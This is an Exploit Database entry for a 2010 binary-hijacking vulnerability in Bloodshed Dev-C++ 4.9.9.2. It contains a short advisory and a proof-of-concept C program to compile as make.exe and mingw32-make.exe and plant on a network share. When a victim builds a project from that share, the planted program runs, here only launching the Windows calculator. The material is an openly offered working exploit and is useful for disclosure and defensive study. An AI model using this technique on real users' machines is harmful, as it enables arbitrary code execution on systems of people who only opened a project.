Bloodshed Dev-C++ 4.9.9.2 – Multiple EXE Loading Arbitrary Code Executions

• Exploit Database
• 15 阅读

• 作者： storm
  日期： 2010-08-25
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34532/

• // source: https://www.securityfocus.com/bid/42737/info
  
  Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
  
  An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
  
  Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected. 
  
  /*
  Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
  Date: August 25, 2010
  Author: storm (storm@gonullyourself.org)
  Version: 4.9.9.2
  Tested on: Windows Vista SP2
  
  http://www.gonullyourself.org/
  
  gcc -o make.exe Dev-C++-Binary.c
  gcc -o mingw32-make.exe Dev-C++-Binary.c
  
  ...and place in appropriate directory.Executes your code four times.
  
  Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected.Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
  
  */
  
  #include <windows.h>
  
  int main()
  {
  WinExec("calc", 0);
  exit(0);
  return 0;
  }